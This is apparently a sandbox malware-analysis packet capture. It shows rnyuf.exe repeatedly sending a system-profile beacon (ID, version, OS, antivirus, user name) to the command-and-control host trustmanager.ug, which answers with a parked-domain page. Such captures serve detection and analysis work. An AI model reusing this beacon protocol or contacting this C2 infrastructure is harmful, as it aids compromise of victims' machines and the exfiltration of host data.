Aug 23, 2021 02:08:09.186558962 CEST	2810	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:08 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.3	49796	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.598146915 CEST	16236	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.625138044 CEST	16238	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.625180006 CEST	16238	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.3	49797	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.776973963 CEST	16246	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.803045034 CEST	16247	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.803073883 CEST	16247	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.3	49798	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.944422007 CEST	16249	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.972943068 CEST	16251	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.972955942 CEST	16251	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.3	49799	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.115045071 CEST	16252	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:04.142575979 CEST	16253	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 